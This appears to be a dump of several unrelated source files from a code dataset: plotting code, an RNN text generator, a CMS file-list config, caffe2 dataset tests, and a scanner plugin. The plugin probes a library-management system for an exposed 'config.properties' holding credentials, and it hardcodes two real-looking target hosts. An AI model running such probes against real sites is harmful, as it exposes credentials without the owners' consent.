#ax[2].set_xlim([-500, 1500])
cmap = plt.get_cmap('binary')
#ax[1].plot(unit_discrim_frame.time, unit_discrim_frame['bool'])
ax[1].plot(unit_discrim_frame.time,
unit_discrim_frame['discrim_bool_cons'],
color = cmap(0.5))
ax[1].fill_between(
x = unit_discrim_frame.time,
y1 = unit_discrim_frame['discrim_bool_cons'],
y2 = 0,
alpha = 0.7,
color = cmap(0.5))
#ax[1].plot(unit_discrim_frame.time,
# np.log10(unit_discrim_frame['p_vals_conv']))
#ax[1].axhline(np.log10(0.05))
ax[1].set_ylabel('Discrim sig')
ax[2].plot(unit_corr_frame.time, unit_corr_frame.corr_rhos,
color = cmap(0.7))
ax[2].fill_between(
x = unit_corr_frame.time,
y1 = unit_corr_frame['corr_rhos'],
#where = unit_corr_frame['corr_pvals'] <= 0.05,
where = unit_corr_frame['sig_bool'],
y2 = 0,
alpha = 0.7,
color = cmap(0.7))
#ax[2].plot(unit_sig_corr.time, unit_sig_corr.corr_rhos, 'x')
ax[2].set_ylabel('Pal Corr sig')
#ax[0].tick_params(axis='x', which = 'both', bottom = False)
ax[0].set_xticklabels([])
ax[1].set_xticklabels([])
#plt.show()
fig.savefig(os.path.join(get_plot_dir(this_region_name),
f'{data_basename}_unit{add_to_counter(this_region_name)}' + '.svg'))
plt.close(fig)
| [
"[email protected]"
]
| |
a7556063e49aff2dda7e2b3cc964e43037048d34 | 6cb1d8f1416af7b7c5c83ab35cb6928ea9955aff | /ch07/rnnlm_gen.py | a30f1107227f403e0e15f919e3f9b09e39193409 | []
| no_license | lee-saint/practice-nlp | f68ccc3140f725f3edcd7048c324b847583b7f20 | 19003fcd5f55f4f110417a3950a32bb5fba1850c | refs/heads/master | 2020-12-01T20:05:15.014495 | 2020-01-21T09:22:18 | 2020-01-21T09:22:18 | 230,750,152 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,799 | py | import numpy as np
from common.functions import softmax
from ch06.RNNLM import Rnnlm
from ch06.better_rnnlm import BetterRnnlm
from dataset import ptb
class RnnlmGen(Rnnlm):
def generate(self, start_id, skip_ids=None, sample_size=100):
word_ids = [start_id]
x = start_id
while len(word_ids) < sample_size:
x = np.array(x).reshape(1, 1)
score = self.predict(x)
p = softmax(score.flatten())
sampled = np.random.choice(len(p), size=1, p=p)
if (skip_ids is None) or (sampled not in skip_ids):
x = sampled
word_ids.append(int(x))
return word_ids
class BetterRnnlmGen(BetterRnnlm):
def generate(self, start_id, skip_ids=None, sample_size=100):
word_ids = [start_id]
x = start_id
while len(word_ids) < sample_size:
x = np.array(x).reshape(1, 1)
score = self.predict(x).flatten()
p = softmax(score).flatten()
sampled = np.random.choice(len(p), size=1, p=p)
if (skip_ids is None) or (sampled not in skip_ids):
x = sampled
word_ids.append(int(x))
return word_ids
if __name__ == '__main__':
corpus, word_to_id, id_to_word = ptb.load_data('train')
vocab_size = len(word_to_id)
corpus_size = len(corpus)
model = RnnlmGen()
model.load_params('../ch06/Rnnlm.pkl')
# 시작(start) 문자와 건너뜀(skip) 문자 설정
start_word = 'you'
start_id = word_to_id[start_word]
skip_words = ['N', '<unk>', '$']
skip_ids = [word_to_id[w] for w in skip_words]
# 문장 생성
word_ids = model.generate(start_id, skip_ids)
txt = ' '.join([id_to_word[i] for i in word_ids])
txt = txt.replace(' <eos>', '.\n')
print(txt)
better_model = BetterRnnlmGen()
better_model.load_params('../ch06/BetterRnnlm.pkl')
# 시작(start) 문자와 건너뜀(skip) 문자 설정
start_word = 'you'
start_id = word_to_id[start_word]
skip_words = ['N', '<unk>', '$']
skip_ids = [word_to_id[w] for w in skip_words]
# 문장 생성
word_ids = better_model.generate(start_id, skip_ids)
txt = ' '.join([id_to_word[i] for i in word_ids])
txt = txt.replace(' <eos>', '.\n')
print(txt)
better_model.reset_state()
model.reset_state()
start_words = 'the meaning of life is'
start_ids = [word_to_id[w] for w in start_words.split(' ')]
for x in start_ids[:-1]:
x = np.array(x).reshape(1, 1)
model.predict(x)
word_ids = model.generate(start_ids[-1], skip_ids)
word_ids = start_ids[:-1] + word_ids
txt = ' '.join([id_to_word[i] for i in word_ids])
txt = txt.replace(' <eos>', '.\n')
print('-' * 50)
print(txt)
| [
"[email protected]"
]
| |
941accb672f76b0db53c6f3a669fcfd3f017badb | 227438026ddb81cb13d174fab2f0c492da6c5975 | /python/MuonGunPt50_FullEta_FullPhi_SmallSigmaZ_cfi.py | a59e85f89d64eceb435409fc4a3a149a836cac4e | []
| no_license | skaplanhex/cms-PLTSimulation | 4c360a56335c673e8c703ea70371e58a1aeff60c | 250e324eb3ea83c965dcb0bab47a53b399cf7625 | refs/heads/master | 2021-01-01T15:17:15.047788 | 2014-10-22T00:11:07 | 2014-10-22T00:11:07 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,016 | py | import FWCore.ParameterSet.Config as cms
source = cms.Source("PoolSource",
fileNames = cms.untracked.vstring(
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_100_1_NnM.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_10_1_fLF.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_11_1_aaa.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_12_1_4PY.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_13_1_Tuz.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_14_1_6RT.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_15_1_9k4.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_16_1_wr8.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_17_1_rU2.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_18_1_nSq.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_19_1_Gjz.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_1_1_lOE.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_20_1_Mfl.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_21_1_tfb.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_22_1_wlo.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_23_1_c2x.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_24_1_oLd.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_25_1_qSB.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_26_1_vVz.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_27_1_iD8.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_28_1_Tpx.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_29_1_Fhe.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_2_1_nj1.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_30_1_VMa.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_31_1_fve.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_32_1_wwI.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_33_1_xSu.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_34_1_aSb.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_35_1_LTi.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_36_1_hPX.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_37_1_gLE.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_38_1_6dM.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_39_1_890.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_3_1_Dwx.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_40_1_6gM.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_41_1_cRm.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_42_1_l0n.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_43_1_9zp.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_44_1_CEr.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_45_1_SG4.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_46_1_jM1.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_47_1_G1x.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_48_1_rHg.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_49_1_9Ex.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_4_1_nbS.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_50_1_rhf.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_51_1_pVw.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_52_1_CNa.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_53_1_2FH.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_54_1_lzt.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_55_1_aJy.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_56_1_tKI.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_57_1_WQ1.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_58_1_Kyp.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_59_1_eUR.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_5_1_SQM.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_60_1_BDu.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_61_1_xhw.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_62_1_22q.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_63_1_QTZ.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_64_1_djT.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_65_1_krx.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_66_1_RVf.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_67_1_bNe.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_68_1_HOD.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_69_1_rRx.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_6_1_trm.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_70_1_k2l.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_71_1_DFG.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_72_1_5LM.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_73_1_QdN.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_74_1_Fwv.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_75_1_8Xf.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_76_1_fiA.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_77_1_1Wb.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_78_1_oGC.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_79_1_BAa.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_7_1_WWX.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_80_1_0gY.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_81_1_gIc.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_82_1_akZ.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_83_1_TZD.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_84_1_D3p.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_85_1_AM5.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_86_1_TnA.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_87_1_lvl.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_88_1_Tv0.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_89_1_G0q.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_8_1_IJR.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_90_1_NTZ.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_91_1_7CQ.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_92_1_bPW.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_93_1_pg2.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_94_1_b1K.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_95_1_qJs.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_96_1_BkG.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_97_1_tGZ.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_98_1_Kof.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_99_1_eMp.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_9_1_fKI.root',
)
)
| [
"[email protected]"
]
| |
f45d517a51288fdf1af81238bef427c053fc9fbe | f47863b3a595cbe7ec1c02040e7214481e4f078a | /plugins/scan/libsys/1530.py | 7d4393ead3d8ab208722872e6653f54514040048 | []
| no_license | gobiggo/0bscan | fe020b8f6f325292bda2b1fec25e3c49a431f373 | 281cf7c5c2181907e6863adde27bd3977b4a3474 | refs/heads/master | 2020-04-10T20:33:55.008835 | 2018-11-17T10:05:41 | 2018-11-17T10:05:41 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 617 | py | #!/usr/bin/python
#-*- encoding:utf-8 -*-
# title:汇文libsys图书管理系统敏感信息泄露
#http://www.wooyun.org/bugs/wooyun-2010-0125785
def assign(service, arg):
if service == "libsys":
return True, arg
def audit(arg):
payload = 'include/config.properties'
url = arg + payload
code, head,res, errcode, _ = curl.curl2(url)
if code == 200 and 'host' and 'port' and 'user' and 'password' in res:
security_warning(url)
if __name__ == '__main__':
audit(assign('libsys', 'http://www.njjnlib.cn:8080/')[1])
audit(assign('libsys', 'http://202.201.163.2:8080/')[1])
| [
"[email protected]"
]
| |
21ea5cf5e0b3b2984691a47e3c896c1d987cf016 | 63c5306b91db445016059a7f0c7ac167bf231d3c | /caffe2/python/operator_test/dataset_ops_test.py | ab6645e250bc558346fef1dfa56e2c3a3abfa0ce | [
"BSD-2-Clause",
"BSD-3-Clause",
"LicenseRef-scancode-generic-cla",
"MIT"
]
| permissive | Fletcher3003/caffe2 | b57ad712993b7c50d16b8f0eedc2e5587bc89e0e | 731096902a090b49612b02cc5a1301c81bf93943 | refs/heads/master | 2020-04-15T18:10:11.514190 | 2019-01-09T17:10:14 | 2019-01-09T17:10:14 | 164,903,847 | 0 | 0 | Apache-2.0 | 2019-01-09T17:02:59 | 2019-01-09T17:02:53 | Shell | UTF-8 | Python | false | false | 21,910 | py | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import numpy as np
from caffe2.python import core, workspace, dataset
from caffe2.python.dataset import Const
from caffe2.python.schema import (
List, Field, Struct, Scalar, Map, from_blob_list, FetchRecord, NewRecord,
FeedRecord
)
from caffe2.python.test_util import TestCase
import numpy.testing as npt
import string
from hypothesis import given
import hypothesis.strategies as st
def _assert_arrays_equal(actual, ref, err_msg):
if ref.dtype.kind in ('S', 'O', 'U'):
np.testing.assert_array_equal(actual, ref, err_msg=err_msg)
else:
np.testing.assert_allclose(
actual, ref, atol=1e-4,
rtol=1e-4, err_msg=err_msg
)
def _assert_records_equal(actual, ref):
assert isinstance(actual, Field)
assert isinstance(ref, Field)
b1 = actual.field_blobs()
b2 = ref.field_blobs()
assert (len(b1) == len(b2)), 'Records have different lengths: %d vs. %d' % (
len(b1), len(b2)
)
for name, d1, d2 in zip(ref.field_names(), b1, b2):
_assert_arrays_equal(d1, d2, err_msg='Mismatch in field %s.' % name)
@st.composite
def _sparse_features_map(draw, num_records, **kwargs):
sparse_maps_lengths = draw(
st.lists(
st.integers(min_value=1, max_value=10),
min_size=num_records,
max_size=num_records
)
)
sparse_maps_total_length = sum(sparse_maps_lengths)
sparse_keys = draw(
st.lists(
st.integers(min_value=1, max_value=100),
min_size=sparse_maps_total_length,
max_size=sparse_maps_total_length,
unique=True
)
)
sparse_values_lengths = draw(
st.lists(
st.integers(min_value=1, max_value=10),
min_size=sparse_maps_total_length,
max_size=sparse_maps_total_length
)
)
total_sparse_values_lengths = sum(sparse_values_lengths)
sparse_values = draw(
# max_value is max int64
st.lists(
st.integers(min_value=1, max_value=9223372036854775807),
min_size=total_sparse_values_lengths,
max_size=total_sparse_values_lengths
)
)
return [
sparse_maps_lengths,
sparse_keys,
sparse_values_lengths,
sparse_values,
]
@st.composite
def _dense_features_map(draw, num_records, **kwargs):
float_lengths = draw(
st.lists(
st.integers(min_value=1, max_value=10),
min_size=num_records,
max_size=num_records
)
)
total_length = sum(float_lengths)
float_keys = draw(
st.lists(
st.integers(min_value=1, max_value=100),
min_size=total_length,
max_size=total_length,
unique=True
)
)
float_values = draw(
st.lists(st.floats(),
min_size=total_length,
max_size=total_length)
)
return [float_lengths, float_keys, float_values]
@st.composite
def _dataset(draw, min_elements=3, max_elements=10, **kwargs):
schema = Struct(
# Dense Features Map
('floats', Map(
Scalar(np.int32), Scalar(np.float32)
)),
# Sparse Features Map
('int_lists', Map(
Scalar(np.int32),
List(Scalar(np.int64)),
)),
# Complex Type
('text', Scalar(str)),
)
num_records = draw(
st.integers(min_value=min_elements,
max_value=max_elements)
)
raw_dense_features_map_contents = draw(_dense_features_map(num_records))
raw_sparse_features_map_contents = draw(_sparse_features_map(num_records))
raw_text_contents = [
draw(
st.lists(
st.text(alphabet=string.ascii_lowercase),
min_size=num_records,
max_size=num_records
)
)
]
# Concatenate all raw contents to a single one
contents_raw = raw_dense_features_map_contents + raw_sparse_features_map_contents + raw_text_contents
contents = from_blob_list(schema, contents_raw)
return (schema, contents, num_records)
class TestDatasetOps(TestCase):
@given(_dataset())
def test_pack_unpack(self, input):
"""
Tests if packing and unpacking of the whole dataset is an identity.
"""
(schema, contents, num_records) = input
dataset_fields = schema.field_names()
net = core.Net('pack_unpack_net')
batch = NewRecord(net, contents)
FeedRecord(batch, contents)
packed = net.PackRecords(
batch.field_blobs(), 1,
fields=dataset_fields
)
unpacked = packed.UnPackRecords(
[], len(dataset_fields),
fields=dataset_fields
)
workspace.RunNetOnce(net)
for initial_tensor, unpacked_tensor in zip(
batch.field_blobs(), unpacked
):
npt.assert_array_equal(
workspace.FetchBlob(initial_tensor),
workspace.FetchBlob(unpacked_tensor)
)
def test_dataset_ops(self):
"""
1. Defining the schema of our dataset.
This example schema could represent, for example, a search query log.
"""
schema = Struct(
# fixed size vector, which will be stored as a matrix when batched
('dense', Scalar((np.float32, 3))),
# could represent a feature map from feature ID to float value
('floats', Map(
Scalar(np.int32), Scalar(np.float32)
)),
# could represent a multi-valued categorical feature map
('int_lists', Map(
Scalar(np.int32),
List(Scalar(np.int64)),
)),
# could represent a multi-valued, weighted categorical feature map
(
'id_score_pairs', Map(
Scalar(np.int32),
Map(
Scalar(np.int64),
Scalar(np.float32),
keys_name='ids',
values_name='scores'
),
)
),
# additional scalar information
(
'metadata', Struct(
('user_id', Scalar(np.int64)),
('user_embed', Scalar((np.float32, 2))),
('query', Scalar(str)),
)
),
)
"""
This is what the flattened fields for this schema look like, along
with its type. Each one of these fields will be stored, read and
writen as a tensor.
"""
expected_fields = [
('dense', (np.float32, 3)),
('floats:lengths', np.int32),
('floats:values:keys', np.int32),
('floats:values:values', np.float32),
('int_lists:lengths', np.int32),
('int_lists:values:keys', np.int32),
('int_lists:values:values:lengths', np.int32),
('int_lists:values:values:values', np.int64),
('id_score_pairs:lengths', np.int32),
('id_score_pairs:values:keys', np.int32),
('id_score_pairs:values:values:lengths', np.int32),
('id_score_pairs:values:values:values:ids', np.int64),
('id_score_pairs:values:values:values:scores', np.float32),
('metadata:user_id', np.int64),
('metadata:user_embed', (np.float32, 2)),
('metadata:query', str),
]
zipped = zip(
expected_fields, schema.field_names(), schema.field_types()
)
for (ref_name, ref_type), name, dtype in zipped:
self.assertEquals(ref_name, name)
self.assertEquals(np.dtype(ref_type), dtype)
"""
2. The contents of our dataset.
Contents as defined below could represent, for example, a log of
search queries along with dense, sparse features and metadata.
The datset below has 3 top-level entries.
"""
contents_raw = [
# dense
[[1.1, 1.2, 1.3], [2.1, 2.2, 2.3], [3.1, 3.2, 3.3]],
# floats
[1, 2, 3], # len
[11, 21, 22, 31, 32, 33], # key
[1.1, 2.1, 2.2, 3.1, 3.2, 3.3], # value
# int lists
[2, 0, 1], # len
[11, 12, 31], # key
[2, 4, 3], # value:len
[111, 112, 121, 122, 123, 124, 311, 312, 313], # value:value
# id score pairs
[1, 2, 2], # len
[11, 21, 22, 31, 32], # key
[1, 1, 2, 2, 3], # value:len
[111, 211, 221, 222, 311, 312, 321, 322, 323], # value:ids
[11.1, 21.1, 22.1, 22.2, 31.1, 31.2, 32.1, 32.2, 32.3], # val:score
# metadata
[123, 234, 456], # user_id
[[0.2, 0.8], [0.5, 0.5], [0.7, 0.3]], # user_embed
['dog posts', 'friends who like to', 'posts about ca'], # query
]
# convert the above content to ndarrays, checking against the schema
contents = from_blob_list(schema, contents_raw)
"""
3. Creating and appending to the dataset.
We first create an empty dataset with the given schema.
Then, a Writer is used to append these entries to the dataset.
"""
ds = dataset.Dataset(schema)
net = core.Net('init')
with core.NameScope('init'):
ds.init_empty(net)
content_blobs = NewRecord(net, contents)
FeedRecord(content_blobs, contents)
writer = ds.writer(init_net=net)
writer.write_record(net, content_blobs)
workspace.RunNetOnce(net)
"""
4. Iterating through the dataset contents.
If we were to iterate through the top level entries of our dataset,
this is what we should expect to see:
"""
entries_raw = [
(
[[1.1, 1.2, 1.3]], # dense
[1],
[11],
[1.1], # floats
[2],
[11, 12],
[2, 4],
[111, 112, 121, 122, 123, 124], # intlst
[1],
[11],
[1],
[111],
[11.1], # id score pairs
[123],
[[0.2, 0.8]],
['dog posts'], # metadata
),
(
[[2.1, 2.2, 2.3]], # dense
[2],
[21, 22],
[2.1, 2.2], # floats
[0],
[],
[],
[], # int list
[2],
[21, 22],
[1, 2],
[211, 221, 222],
[21.1, 22.1, 22.2],
[234],
[[0.5, 0.5]],
['friends who like to'], # metadata
),
(
[[3.1, 3.2, 3.3]], # dense
[3],
[31, 32, 33],
[3.1, 3.2, 3.3], # floats
[1],
[31],
[3],
[311, 312, 313], # int lst
[2],
[31, 32],
[2, 3],
[311, 312, 321, 322, 323],
[31.1, 31.2, 32.1, 32.2, 32.3], # id score list
[456],
[[0.7, 0.3]],
['posts about ca'], # metadata
),
# after the end of the dataset, we will keep getting empty vectors
([], ) * 16,
([], ) * 16,
]
entries = [from_blob_list(schema, e) for e in entries_raw]
"""
Let's go ahead and create the reading nets.
We will run `read` net multiple times and assert that we are reading the
entries the way we stated above.
"""
read_init_net = core.Net('read_init')
read_next_net = core.Net('read_next')
reader = ds.reader(read_init_net)
should_continue, batch = reader.read_record(read_next_net)
workspace.RunNetOnce(read_init_net)
workspace.CreateNet(read_next_net, True)
for entry in entries:
workspace.RunNet(str(read_next_net))
actual = FetchRecord(batch)
_assert_records_equal(actual, entry)
"""
5. Reading/writing in a single plan
If all of operations on the data are expressible as Caffe2 operators,
we don't need to load the data to python, iterating through the dataset
in a single Plan.
Where we will process the dataset a little and store it in a second
dataset. We can reuse the same Reader since it supports reset.
"""
reset_net = core.Net('reset_net')
reader.reset(reset_net)
read_step, batch = reader.execution_step()
""" We will add the line number * 1000 to the feature ids. """
process_net = core.Net('process')
line_no = Const(process_net, 0, dtype=np.int32)
const_one = Const(process_net, 1000, dtype=np.int32)
process_net.Add([line_no, const_one], [line_no])
field = batch.floats.keys.get()
process_net.Print(field, [])
process_net.Add([field, line_no], field, broadcast=1, axis=0)
""" Lets create a second dataset and append to it. """
ds2 = dataset.Dataset(schema, name='dataset2')
ds2.init_empty(reset_net)
writer = ds2.writer(reset_net)
writer.write_record(process_net, batch)
# commit is not necessary for DatasetWriter but will add it for
# generality of the example
commit_net = core.Net('commit')
writer.commit(commit_net)
""" Time to create and run a plan which will do the processing """
plan = core.Plan('process')
plan.AddStep(core.execution_step('reset', reset_net))
plan.AddStep(read_step.AddNet(process_net))
plan.AddStep(core.execution_step('commit', commit_net))
workspace.RunPlan(plan)
"""
Now we should have dataset2 populated.
"""
ds2_data = FetchRecord(ds2.content())
field = ds2_data.floats.keys
field.set(blob=field.get() - [1000, 2000, 2000, 3000, 3000, 3000])
_assert_records_equal(contents, ds2_data)
"""
6. Slicing a dataset
You can create a new schema from pieces of another schema and reuse
the same data.
"""
